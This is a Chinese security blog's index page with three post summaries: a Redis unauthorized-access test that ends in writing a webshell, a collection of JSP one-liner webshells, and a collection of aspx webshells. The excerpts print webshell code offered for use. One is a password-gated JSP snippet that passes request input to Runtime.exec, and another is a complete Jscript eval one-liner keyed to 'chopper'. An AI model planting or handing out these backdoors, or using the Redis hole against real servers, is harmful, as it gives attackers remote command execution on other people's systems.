摘要: 0x01 环境搭建 启动redis服务进程后,就可以使用测试客户端程序redis-cli和redis服务交互了。 比如: 0x02 未授权访问漏洞测试 使用redis客户端直接无账号成功登录redis: 从登录的结果可以看出该redis服务对公网开放,且未启用认证。 利用redis写webshell 阅读全文
posted @ 2017-09-21 13:59 Bypass 阅读(8056) 评论(0) 推荐(1) 编辑
摘要: JSP一句话收集: 1、带密码的回显cmd马 <% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")) 阅读全文
posted @ 2017-09-21 10:23 Bypass 阅读(47060) 评论(1) 推荐(3) 编辑
摘要: aspx木马收集: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> 随日期变化的连接密码, Asp.NET服务端写法: <%@ Page Language="Jscript"%><%eval(Reque 阅读全文
posted @ 2017-09-21 09:18 Bypass 阅读(25425) 评论(0) 推荐(0) 编辑